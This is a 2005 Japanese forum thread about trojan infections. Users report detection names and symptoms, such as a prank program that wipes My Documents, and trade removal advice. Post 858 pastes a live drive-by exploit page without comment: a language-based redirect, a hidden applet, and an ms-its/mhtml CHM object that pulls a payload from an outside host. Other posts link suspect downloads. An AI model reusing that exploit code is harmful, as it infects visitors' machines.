1.心構えが肝心な人だが、アンチウイルスは入れてなかった人。
2.心構えは普通の人だが、アンチウイルスを入れていた人。

さて、1と2のどちらがウイルス病原菌に強いのでしょうか?

796 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 15:42:45 ]
笑ってしまった。

セキュリティと心構えは表裏一体だ。
スキルのある人は、セキュリティの構築もそれなりのものがある。

797 名前:名無しさん@お腹いっぱい。 [2005/04/17(日) 15:46:02 ]
本当に心構えが肝心な人ならexeをクリックしないね

798 名前:名無しさん@お腹いっぱい。 [2005/04/17(日) 15:52:35 ]
一流はexeを消すよ

799 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 15:59:26 ]
IPを記録してストーカーみたいな行為をする
運営人も一部にはいるから串がないと2ちゃんに来ちゃだめだよ。

800 名前:名無しさん@お腹いっぱい。 [2005/04/17(日) 16:04:59 ]
前回(edition.cnn.com/POLLSERVER/results/17016.exclude.html)も相手側の物量作戦に惨敗。
まぁ馬鹿馬鹿しいと言わずに1回位勝ってみてもいいんじゃないの?にっぽん。

  
【今回のCNN投票】
Do you think China's anti-Japanese sentiment is justified? Yes or NO
中国の反日感情は正当化できますか? Yes or NO
edition.cnn.com/2005/WORLD/asiapcf/04/15/china.japan/index.html


投票状況 現在NOがやや劣勢!世界は中国を否定する!
edition.cnn.com/POLLSERVER/results/17063.exclude.html


>■ 超かんたんCNN自動投票アプリ ■
>今度こそ最終版
>※readme.txtは必ず読んで下さい
>www.uploda.org/file/uporg77266.zip



※各所コピペ推奨

801 名前:名無しさん@お腹いっぱい。 [2005/04/17(日) 16:10:21 ]
>>800ここは、トロイの木馬の現状とそれを取り巻く状況について語るスレです。





802 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/17(日) 16:12:22 ]
にっき
えいごがなんてかいてあるのかわからないので、
きっと「いたちがいはうざいとおもいますか?」とかいてあるんだろうとおもった
yesにとうひょうした

803 名前:名無しさん@お腹いっぱい。 [2005/04/19(火) 13:43:11 ]
【田代砲専用】日本 2ch VS 中国 2ch 【作戦会議所】Part 20

pastorale.rdy.jp/test/read.cgi/tashiro/1113824057/




804 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/19(火) 22:21:32 ]
cyberdyne-co-ltd.hp.infoseek.co.jp/burakura-11-20.html
ここの19ってトロイか?

805 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/20(水) 23:05:26 ]
>>804
FireFox1.03で開いたらFireFoxがあがったりさがったりする。
うざいからタスクバーでFireFox終了させた。


806 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/21(木) 01:05:09 ]
面白そうだから、その19を踏んでみたが、オミトロン経由のせいかなんにも起きない。

807 名前:名無しさん@お腹いっぱい。 [2005/04/25(月) 22:07:43 ]
PCのアイコンが消えたり正常に動作しないのでトレンドマイクロでオンラインスキャンしたところTROJ_WINTRASH.Dに感染してしまったようです。
↓の症状も出てます。

>>そして、この不正プログラムは "WELCOME.EXE" を実行します。 "WELCOME.EXE" はコンピュータのCPU使用率を100パーセントにします。

 この不正プログラムはすべてのファイルおよびアイコンを隠すことを試みます。これによりWindowsが使用できなくなることがあります。

対応方法がOSの再インストールをする事みたいなのですが、cドライブを消したくないのでどうにかそれ以外で対処法が無いでしょうか?
OSはMEです。ご存知の方いましたら御教授お願いします。

トレンドマイクロのデータ-ベースですttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_WINTRASH.D



808 名前:名無しさん@お腹いっぱい。 [2005/04/26(火) 01:27:48 ]
韓国の奴からトロイもらったんだけど・・・

809 名前:808 [2005/04/26(火) 01:30:12 ]
中国の奴からは侵入されるし・・・

ネット戦争でも始まったのか?

810 名前:名無しさん@お腹いっぱい。 [2005/04/26(火) 10:17:19 ]
ご教授ください。

OS:Windows Me SecondEdition
IE:IE
最近どちらもパッチは当ててません。
トロイ対策としては、spybotを入れています。
昨日、トレンドマイクロオンラインスキャンにかけたところ、
トロイに感染してる模様です。
名前はTROJ_HKPROP.Aで、主にC\_RESTORE\TEMPの中のCPY
ファイルが感染していると出てきました。
が、データベースを探しても、Googleで検索しても、このトロイの詳細が
判りません。
spybotでスパイウェア等削除しIEのキャッシュをクリアしても何度も
出てきます。
これは一体なんでしょうか?
対処法はありますでしょうか?
よろしくお願いいたします。

811 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/26(火) 10:52:02 ]
Windows MEにSecondEditionなんてあったか?



812 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/26(火) 11:05:39 ]
>>810
検索しようね。
www.google.com/search?hl=ja&q=_RESTORE&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=

813 名前:名無しさん@お腹いっぱい。 [2005/04/26(火) 13:10:29 ]
>>811
慌ててもう一台のマシンと混同しました。すみません。

>>812
慌てて書き込んでしまいましたが、cabファイルやexeファイルにも
感染していて、手順の通りにしてもFIFOでも手動でも削除できません。
何度も再起動をかけましたが復元される模様です。

場所はc\_RESTORE\ARCHIVE\FS(数字).cab*A(数字).cpy* と、
c\windows\inertinfo.exeです。

どうしたらよいのでしょうか。よろしくお願いいたします。

814 名前:名無しさん@お腹いっぱい。 [2005/04/26(火) 13:29:03 ]
>>813
検出名が間違ってないか?復元を無効にしたやり方は間違ってないか?
シマンテックのスキャンもやってみたら?
www.symantec.com/region/jp/securitycheck/index.html
あと、体験版のアンチウィルスをダウンロードしてインストールするという方法もある。

815 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/26(火) 13:29:21 ]
WindowsUpdateもしないで皆目見当も付かぬトロイに取り憑かれて
2ちゃんで助けて〜なんつってる馬鹿は
自分で置いた石につまずいて電車に轢かれて息絶えればいい

816 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/26(火) 13:38:44 ]
んだな。
感染してからアンチウィルスとか導入しても、
無効化されたり定義ファイル取りに行くのを阻止されたりすることがあるから、
ほんとは予防が肝心なんだよな。

817 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/26(火) 13:49:16 ]
名前がTROJ_HKPROP.Aで本当に合ってる?

818 名前:名無しさん@お腹いっぱい。 [2005/04/26(火) 16:53:43 ]
>>815
>>816
俺の事だorz
もうどうしたらいいか分からん…

819 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/26(火) 17:32:20 ]
810=813です。

>>814
ありがとうございます。
試してみます。

>>817
トレンドマイクロ・オンラインスキャンではその名前が出てきました。
間違いないです。


仕方ないので検出されたファイルをまるごと全削除してみようと思います。
(その上でシステムに影響が出るようなら再インストールします…)
ありがとうございました。

820 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/27(水) 17:32:14 ]
a-squaredで以下のように検知されたのですが、

gifan080.exe →  Backdoor.Win32.Sandrator.c

以下のリンク2個とも 同じ結果でした。

ttp://www.hornet-works.com/
ttp://bar43.hp.infoseek.co.jp/lw/3/gifan080.zip

たのスキャンソフト使ってる方、どんな結果になるか
情報お願いします。

821 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/27(水) 19:01:00 ]
・eScan
 www.mwti.net/antivirus/mwav.asp
・ウイルスバスターOn-Line Scan
 www.trendmicro.co.jp/hcall/index.asp
・Symantec Security Check
 security2.norton.com/ssc/home.asp?j=1&langid=jp&venid=sym>
・McAfee.com ウイルススキャンオンライン
 www.sourcenext.com/mcafee/products/vso/>
・BitDefender Scan OnLine
 www.bitdefender.com/scan/Msie/index.php>
・Command On Demand
 www.commandondemand.com/eval/index.cfm>
・DrWeb
 www.dials.ru/english/www_av/home.htm>
・Panda Active scan
 www.pandasoftware.es/activescan/de/default.asp?IdVendor=1&IdLang=3&I>
・Free online Trojan Scanner
 www.trojanscan.com/



822 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/27(水) 23:32:42 ]
>>820
Kaspersky、BitDefender、Ewidoの最新定義で反応なし
誤検出くさいですね

823 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/04/27(水) 23:36:34 ]
>>822
レスサンクス。

824 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/02(月) 22:07:31 ]
>>822
違うファイルでも発見されたけど・・・Backdoor.Win32.Sandrator.c

825 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/02(月) 22:41:36 ]
>>824
誤検知 っぽいね

826 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/02(月) 23:00:07 ]
セキュリティに気をつけた上で対策ソフトを入れていると検出されるものは99%誤検出と言ってもいい。
P2Pやアングラ巡りで不審なものをよく落としてくる人にはこういう判断がしづらいよね。

827 名前:名無しさん@お腹いっぱい。 [2005/05/02(月) 23:30:09 ]
ToRoIBusterっていったい何者なのかなぁ・・・。

828 名前:名無しさん@お腹いっぱい。 [2005/05/03(火) 19:24:28 ]
Trojan. StartPageってのに感染してたよ(;´Д`)
tempの中にあったse.dllってのが感染してたみたい。
about:blank でsearch forというページにスタートアップ時のHPを固定しやがる
とりあえずトロイは脳豚で消したがスパイウェアが消えねぇー

829 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/04(水) 03:05:42 ]
StartPageってハゲ始めてますよって言われてるみたいだなw

830 名前:名無しさん@お腹いっぱい。 [2005/05/04(水) 23:30:09 ]
ファイル整理中に誤って変なファイルダブルクリックしたらトロイだった…orz
再起動したらバッファオーバーフローしたみたいな画面が大量に出て、
更にゴキブリが出てきたので、速攻Safeモードにして手動でそのファイルと
関連レジストリ消してなんとかなった。
これって有名なやつなんでしょうか?

831 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/04(水) 23:35:19 ]
そんなトロイがあるか



832 名前:名無しさん@お腹いっぱい。 [2005/05/04(水) 23:42:25 ]
>>831
端折りすぎた('A`)
間違って変なファイルをダブルクリック>何かインストールされた>再起動したら小さいウインドウが大量に出て、
「バッファオーバーフロー〜」とか書かれてた>更に画面上にゴキブリが表示されて動きまくり

こういう状態になりますた。

833 名前:名無しさん@お腹いっぱい。 [2005/05/04(水) 23:44:45 ]
>>767
Trojan.VBS.IFrameをとりあえず確認。


834 名前:833 [2005/05/05(木) 00:42:44 ]
あとはAdware.FunWeb.dだけでした。

835 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/05(木) 02:26:36 ]
>>832
トロイじゃなくてウイルスだ

836 名前:  mailto:sage [2005/05/05(木) 15:45:32 ]
912 名無しさん@お腹いっぱい。 2005/05/01(日) 14:25:21
【使用OS】 XP home

【WindowsUpdateしてるか】 しています

【AntiVirusは何を使っているか】 使ってません

【別のオンラインスキャンしたならその結果は】 トレンドマイクロのオンラインスキャンで発見できず

【症状を具体的に、分かる限りすべて書く】 
起動時に、窓が物凄い勢いで開きまくり、ゴキブリの画像が縦横無人に走っていきました
すぐその場で再起動かけましたが、マイドキュメント内のファイルが吹っ飛び、かわりに(・ё・)00001.jpgなどの
ファイルが作られていました。

【何をしたらそんなことになったのか】 とても人には言えないようなEXEファイルを開いてしまいました
EXEファイル自体はオンラインスキャンに反応もせず、安心してクリックしたところ、明らかにウィルス仕込まれた
ような挙動をしたので、すぐにその場でオンラインスキャンしたんですが何も検出されませんでした。
そして今朝再起動したところ、上のような症状が出た次第です。

【これまでにとった措置】  再起動してトレンドマイクロオンラインスキャンにかけています

つづき↓

837 名前:  mailto:sage [2005/05/05(木) 15:46:14 ]
951 名無しさん@お腹いっぱい。 2005/05/02(月) 08:24:44
>>912
これと違うか?

ダウンロードありがとうございますm(_ _)m。

このソフトは、イタズラが目的のソフトです。
イタズラ以外に使い道がありません。
デスクトップにゴキブリやハエが出現したり、勝手にディスクをフォーマット(嘘ですが)したりします。
ハエやゴキブリは出現している間も、Windows通常の操作ができます。
出現時間や、出現するキャラクターの設定もできます。
ゴキブリやハエが嫌いな人は使用しないで下さい。(^_^;)
また、ジョークの分からない人、及び、心臓の弱い人に使用するのもやめてくださいm(_ _)m

952 名無しさん@お腹いっぱい。 sage 2005/05/02(月) 08:30:06
>>951
そのソフトを元に、誰かが悪質に改竄したものじゃないか?
データが書き換えられてるようだから。ジョークの域を超えている。
元ソフトはVectorでダウソできる。

838 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/06(金) 15:07:36 ]
a2いつから日本語化されてたの?

839 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/07(土) 17:57:33 ]
OS XPでノートン2005を導入して一ヶ月くらいたったんですが
 
セキュリティ警告
ルールStrikeトロイの木馬のディフォルト切断のセキュリティ警告を製作しました。

というメッセージが止まらなくなってしまいました、ウイルスに感染しているのでしょうか?

840 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/08(日) 01:04:57 ]
エールStrike

841 名前:名無しさん@お腹いっぱい。 [2005/05/10(火) 19:01:58 ]
私も>832と同じ症状になりました。
今は別PCから書き込んでますが、セーフモードでの起動もできなくなって困っております。

exeファイルをクリックしたときにavast!が反応して
Win32:Torjan-gen{UPX!}とか言ってましたが・・・・・



842 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/12(木) 01:28:05 ]
Trojan

843 名前:名無しさん@お腹いっぱい [2005/05/12(木) 09:15:05 ]
>>837
私もハエ・ゴキ型ウイルス攻撃喰らいました。
攻撃直後にマイドキュないのデータ全て消失>_<
あるソフトのパッチファイルに偽装していました。

844 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/12(木) 11:28:57 ]
>>843
トロイでもウィルスでもない不正プログラムだろう。
拾いに行って自分で実行しなければ被害にあわないし、
NT系なら管理者権限でログオンしてなければ実行しても被害にあわないはず。

845 名前:名無しさん@お腹いっぱい。 [2005/05/12(木) 16:49:28 ]
TROJ_AGENT.ABSというトロイが定期的にリアルタイムでウイルスバスターに
検出されて隔離されます。これはどうなるんですか?

846 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/12(木) 21:03:50 ]
漏れも>828サソと同じ状態になっちゃったわなー
これ新種のトロイなんじゃないのかヽ(`Å´)ノ

847 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/12(木) 21:17:06 ]
感染報告スレかここは。

848 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/13(金) 18:46:19 ]
予防してないのが悪いんだよね、結局

という俺はトロイに感染してHDDフォーマットしたはいいが、
OSをインストールできない
(古いマシンでFDDからじゃないとブートできないんだが、
セカンドマシンであるこれのFDDが壊れててブートディスク作れねぇ)
から、新しいパソコンを購入する羽目になったわけだがな

ってか、トロイ目的で一番いいソフトってどれなんかなぁ
ewidoって常駐保護してる?

849 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/13(金) 20:12:11 ]
>>848
FDDを買ってくれば良いじゃん

ewidoの有料版の方は常駐しますよ

850 名前:848 mailto:sage [2005/05/14(土) 00:45:19 ]
>>849
いや、そうなんだけどどうせ買うなら新しいのと思って
古かったからついでに

ってか、ewido起動したらさ
「リアルタイムプロテクション有効」とか出てない?
やっぱ常駐保護じゃないのかな、それとも期日制限あるのか・・・

どっちにしろ、すり抜けたトロイに感染したわけだけどね・・・

851 名前:  mailto:sage [2005/05/14(土) 04:15:41 ]
>>846
search forに変わるのはCoolWebSearchじゃなかったっけ?>Spywawe



852 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/14(土) 22:48:33 ]
私も窓が無限に開いてゴキブリやハエが画面上に現れるウイルスを踏んでしまいました。
セーフモードで本体と関連レジストリを消せば何とかなるようですが、
レジストリで何を消せばいいのかわかりません。
どなたか教えてください。

853 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/15(日) 07:45:41 ]
あーーー畜生!!!
「Troian.ByteVerify」に感染しちまったよ・・。

くたばれ!このオレ!!!

854 名前:名無しさん@お腹いっぱい [2005/05/15(日) 17:50:30 ]
>>852
これってデスクトップの憂鬱って言うジョークソフトを改造して作った悪質な
削除ファイルみたいだね



855 名前:853 mailto:sage [2005/05/16(月) 01:14:24 ]
www.symantec.com/region/jp/avcenter/venc/data/trojan.byteverify.html

上記のサイトを参考に対処してみたんだけど、
PCをセーフモードの状態でスキャンを実行という所で
セーフモードにしてもノートンを起動できなかったんだよね・・。

それで通常モードに戻してそれから起動してノートンのウイルス情報を更新してスキャン実行したら
削除できたんだけど、これで良かったのかな?

その後ノートンには[システムの状態:問題ありません]と表示されてるので
完全に駆除できたと判断して良い?

856 名前:名無しさん@お腹いっぱい。 [2005/05/16(月) 21:20:33 ]
>>853
お前さん、FFDQ板の奴か?

857 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/16(月) 21:39:01 ]
search for関連は怪しいプロセスが
winに常駐しちまってる。どこかに実行ファイルがあるはず。

俺はCAのオンラインスキャンで検査して手動で削除して復帰したぞ。
知り合いに頼まれたからだが、えらく手間がかかった。

というか、その時PCに入っていたノートンせんせじゃ発見、削除できず。

あとタスクマネージャーで動いている怪しいプロセスをググッてウイルスだと確信してから
消した。
セーフモードのプロンプトでしか消せない奴もあった。

858 名前:名無しさん@お腹いっぱい。 [2005/05/16(月) 22:28:23 ]
<script language="JavaScript">
var lang = navigator.systemLanguage;
if (lang == "ru") document.location = "awmcash.biz/adverts/nafig.html";
if (lang == "cn") document.location = "awmcash.biz/adverts/nafig.html";
if (lang == "zh") document.location = "awmcash.biz/adverts/nafig.html";
</script>
<html>
<head>
<title></title>
</head>
<body>
<applet CODE="BlackBox.class" width=1 height=1></APPLET>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>

859 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/16(月) 22:28:59 ]
>>858
おい

860 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/18(水) 19:32:34 ]
うわあ感染したあ

861 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/20(金) 04:27:14 ]
Backdoor.Jupdateというのに感染してしまいました
アンチウイルスはavastを使っているんですがavastでは削除できず
オンラインスキャンをしてみたら感染していました
どうかお助けをお願いします



862 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/20(金) 04:40:21 ]
リークテストの話でもしようぜ

863 名前:名無しさん@お腹いっぱい。 [2005/05/20(金) 18:42:50 ]
インターネットしてたら
マカフィーが、トロイがどうたらっていうのが出ました
今マカフィーのウイルススキャンしてるんですけど
感染ファイルが出てきたらどうすれば良いでしょうか
OSはXPです

864 名前:名無しさん@お腹いっぱい。 [2005/05/20(金) 18:44:09 ]
1 名前:匿名 2005-05-20 15:30 評価:     
www1.ezbbs.net/14/sion158/
www.geocities.jp/hellworld_1/web.html

myhome.hananet.net/~crazyghost/goto.htm
i1i9.net/pp/?kwc
arvan.nobody.jp/online/
omanko45.tvheaven.com/

多分この中のどれかだと思います

865 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/20(金) 18:57:27 ]
今検索終了したんですけど
感染ファイルが見つかりませんでした
マカフィーのウイルススキャンではひっかからないのでしょうか

866 名前:名無しさん@お腹いっぱい。 [2005/05/23(月) 22:53:10 ]
>>861
ノートンで対策済み
なぜなら実際にそれ俺のパソに侵入しようとしてた

867 名前:名無しさん@お腹いっぱい。 mailto:age [2005/05/24(火) 17:57:20 ]
ノートン先生が、
Blood hound Expoliteに感染していると言われるので、
検索結果に従い、セーフモードでスキャン中なのですが、
これで対策はあっているでしょうか?
セーフモードから通常に戻す方法も回答いただけるとありがたいです。
よろしくお願いします。

868 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/25(水) 04:44:35 ]
> セーフモードから通常に戻す方法

普通に再起動すれば良い

869 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/25(水) 13:44:15 ]
いつも思うんだが、こういうことを聞く奴は、自分と同じウイルスに感染した
かつ自分の疑問に適切に答えられる程度のスキルか知識を持った人が
このスレに偶然いると思っているのか?
表示されたor検索で出てきた方法で対処するしかなかろーに

870 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/25(水) 16:16:06 ]
>>869
暇潰しがてらに俺様が自作自演してるだけだから気にするな禿げ

871 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/26(木) 17:44:20 ]
>>870
( ´_ゝ`)σ)Д`)



872 名前:名無しさん@お腹いっぱい。 [2005/05/31(火) 01:44:12 ]
syatem32内にmousehs.exeを組み込まれ、Backdoor.Small.fbが検出されました。
しかし、このバックドア、隔離も削除もできないんです・・・。mousehs.exeも同様に削除できない。
どうすればいいんでしょうか?

873 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/31(火) 01:47:00 ]
そういう質問を投げかけられて、あなたらなんて答えますか?

874 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/31(火) 04:07:02 ]
たわば

875 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/31(火) 04:31:23 ]
>>872
EXEはあなたのパソコンの中を走りまわっています、
ものすごい勢いで走ります、
最初から走ります、めっちゃ走ります。
RUNNING、そうです、イッツ ランニング パーフェクトリィ なのです。
お解りですか?

876 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/05/31(火) 21:58:06 ]
起動オプションでセーフモードでDOS窓から消せ。

877 名前:裏タモリ ◆FO2HkZCJ9E [2005/06/01(水) 01:23:38 ]
トロイの木馬に感染してしまった様です。
最近、頭の中から知らない人の声が聞こえるんです。
誰かに操作されている。
このまま行くと私はどうなってしまうのでしょうか。
削除しようと思うのですが、怖いです。

878 名前:名無しさん@お腹いっぱい。 [2005/06/01(水) 08:32:24 ]
Nortonがトロイの木馬を検出しました。退治するにはどうすればよいのでしょう?


879 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/01(水) 08:42:18 ]
量子魚雷を撃て

880 名前:名無しさん@お腹いっぱい。 [2005/06/01(水) 14:44:02 ]
TROJ_DYFUCA.CR
TROJ_ISTBAR.GEN
TRPJ_DLDR.DLL
オンラインスキャンで調べたらこの三つ感染してたんだがどうやって消せばいいの?
ウイルスバスター購入せんとだめ?


881 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/01(水) 14:54:13 ]
Swat Itの使い方どっかにない?
英語で全然わからへん・・・



882 名前:名無しさん@お腹いっぱい。 [2005/06/01(水) 14:56:21 ]
>>878>>880
検出した製品のベンダーのサイトで調べろ。
名前が分かっているなら、その名前でぐぐれ。

883 名前:名無しさん@お腹いっぱい。 [2005/06/01(水) 16:15:20 ]
ぐぐってもわからん。
レジストリエディタとかなんてチンプンカンプンやし

884 名前:名無しさん@お腹いっぱい。 [2005/06/01(水) 16:24:38 ]
【ドモコ】 winnyキンタマウイルス感染 【テラヤバス】  
news19.2ch.net/test/read.cgi/news/1117609611/
NTTドコモ東海が静岡、愛知、岐阜県内に設置した携帯電話基地局
約800カ所の所在地や入局方法などをまとめた「社外秘」扱いの資料が、
ネット上に流出していることが分かった。事態を重視した同社はすべての
鍵を付け替えるなど緊急対策を実施した。ファイル交換ソフト「ウィニー」の
ウイルス感染が原因とみられる。


885 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/01(水) 20:07:33 ]
>>883
じゃあ製品を買えよ

886 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/02(木) 10:38:46 ]
>>881
Swat Itの公式ページ
ttp://swatit.org/
をYahoo↓とかのWeb翻訳サイトで訳せばいい
ttp://honyaku.yahoo.co.jp/url


887 名前:テイト [2005/06/03(金) 23:36:07 ]
748 :テイト:2005/06/03(金) 23:33:17
2ちゃんから別のサイトにジャンプしたら
(新シャア板 さすが○○は××のお家芸だなで1000を目指すスレ
の53番のレスです・・)

トロイの木馬に感染した旨のメッセージが出ました
マカフィーセキュリテイースイーツを
使っていたので削除し、ウイルススキャンしても
異常はありませんでした

その後gooなどで、オンラインウイルスチエックがあると聞き
ウイルスバスターとsymateckの2社のを利用したところ

ウイルスバスターではHTML_REDIR.Aに感染
symateckではUnix.Penguinに感染
との診断が・・・

後者は2ちゃん利用の誤検出かもしれませんが
前者のほうが気になります
どなたか削除の方法や対処法などご存知の方教えてください


888 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/03(金) 23:48:59 ]
>>887
最初にやることは検索じゃないかな。

HTML_REDIR.Aで検索
www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=HTML_REDIR.A

889 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/07(火) 05:38:28 ]
    , - ' ゙    `` ‐ 、_,,,,,
   ,r'          /=ミ
  /           彡ll',''´
. /             彡lll
 !-- .、    ,、、、、,,,   彡lノ
 l,,,,,__ /   ___     'r''゙ヽ
. |`゙'' ./   `'゙'''"    .〉,l |
 |.   ,'           //
. ',. ,'           , r'
.  ゙, ゙'ー ‐`      l  |
   ゙、''゙ ,,、二''‐    ノ  l、
''''''''7'ヽ  '''    /   /`〉`゙T''''''''''
  l  ` 、,,,,、- ' "    / /.|  |
.  |  |  .l i       / ./ |  |
  |  |  | l      / ./ .|  |
. |  |   | l     / /  |  |
 |  |   | ',   / /  l  .l
【ゴールデンレス】
このレスを見た人はコピペでもいいので
10分以内に3つのスレへ貼り付けてください。
そうすれば14日後好きな人から告白されるわ宝くじは当たるわ
出世しまくるわ体の悪い所全部治るわでえらい事です

890 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/07(火) 08:58:04 ]
www.inohost.com/
このWarezサイトの解析お願いします。
どのリンクを辿っても
ysbinstall_1002755_3.exeとかpatch_1002755_3.exeのような
いかにも怪しいファイルしか落とせません。
一体何のために存在するサイトなのでしょうか?

891 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/07(火) 12:31:40 ]
>>890
欲に目が眩んで基本的な警戒すら怠る人を懲らしめるためのサイトではないかと(w

それからその「怪しいファイル」はトロイだから気を付けてね
ちなみにノートンやAVGだと引っ掛からなかったりもするけど



892 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/22(水) 03:37:07 ]
test

893 名前:名無しさん@お腹いっぱい。 [2005/06/27(月) 16:14:53 ]
トロイの木馬にやられたPCを再インストールして買ったときの状態に
戻したんですがそれでウイルスはなくなるんですか?

894 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/06/27(月) 17:12:37 ]
>>893
なくなるとは限らない。システムドライブ(C):だけが感染してたならいいが、
他のドライブにも移ってる恐れはあるので、復旧後にスキャンした方がいい

895 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/04(月) 16:28:42 ]
※トロイ注意※

音声ファイル変換ソフト「Vocal Cancel」が、「トロイの木馬(TROJ_HIROFU.A)」であると確認された。
ttp://www.vector.co.jp/info/050704_vocal_cancel.html

※現時点で対応しているアンチウイルス製品
ウイルスバスター(最速で対応)
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_HIROFU.A&VSect=T
ノートン(手動アップデートでやっと対応)
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.hirofu.html


・NOD32は未対応。

896 名前:名無しさん@お腹いっぱい。 [2005/07/05(火) 12:06:06 ]
SwatIt使ってる人少ないのかなぁ
更新頻度は低いけど数少ないフリーツールだのにだのにだー

897 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/05(火) 12:26:32 ]
>>896
無料版は月イチでの更新みたいですね

898 名前:896 mailto:sage [2005/07/05(火) 12:46:27 ]
>>897
俺は月一で充分だと思うけど。
スキャン自体、月数回だし。
spybotやad-awareみたいな感じの気休めツールとして捉えてるんで。
よしよし怪しいのは入ってないなと確認。
本気で頼るなら常駐ツールでないとね。

899 名前:名無しさん@お腹いっぱい。 [2005/07/06(水) 23:43:12 ]
変な顔の絵が表示されてかかるのってトロイだっけ?

900 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/07(木) 13:18:22 ]
>>895
音声ファイル変換ソフト「Vocal Cancel」が、「トロイの木馬(TROJ_HIROFU.A)」であると確認された。
ttp://www.vector.co.jp/info/050704_vocal_cancel.html

※7月7日時点で対応しているアンチウイルス製品
ウイルスバスター(最速で対応)
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_HIROFU.A&VSect=T
ノートン(自動アップデートでも対応)
ttp://www.symantec.com/region/jp/avcenter/venc/data/jp-trojan.hirofu.html
マカフィー
ttp://vil.nai.com/vil/content/v_134732.htm

【・NOD32は未対応】

補足情報)
第二の価格コム事件とも言える「ozmall」のサーバがクラックされた事件の場合では、
現時点で4製品が問題のウイルスを検出できてます。
ttp://www.ozmall.co.jp/050530/virus.html#soft
                       検出 駆除
マカフィー(Managed VirusScan)    可   可
アンラボ(V3ウイルスブロック2005)  可   可
F-Secureアンチウィルス.        可   可
Kaspersky                 可   可
NOD32                   不能 不能

901 名前:名無しさん@お腹いっぱい。 [2005/07/08(金) 12:15:02 ]




902 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/08(金) 13:17:45 ]


903 名前:名無しさん@お腹いっぱい。 [2005/07/08(金) 20:19:18 ]
ここのスレ開くとノートンが
コンピューター上にウイルスが検出されました
Bloodhound.Exploit.6
って出るんですが
これはどういう意味でしょうか?
自分のコンピューターがウイルスに感染してるんですか?
マジレスお願いします。

904 名前:  mailto:sage [2005/07/08(金) 21:02:59 ]
>>903
コンピューター上というかこのスレのファイルにじゃないかな。
だとすればノートントラップの可能性。

905 名前:名無しさん@お腹いっぱい。 [2005/07/08(金) 21:22:59 ]
>>904
感染してないってことですよね?
レスありがとうございました。

906 名前:名無しさん@お腹いっぱい。 mailto:sage [2005/07/09(土) 21:36:38 ]
●みずほダイレクトを狙ったスパイウェア、郵貯や東京三菱などもターゲット●
ttp://internet.watch.impress.co.jp/cda/news/2005/07/08/8345.html

(7月9日時点)
ウイルスバスター
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TSPY_BANCOS.ANM
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=SPYW_INVKEY12.A

ノートン
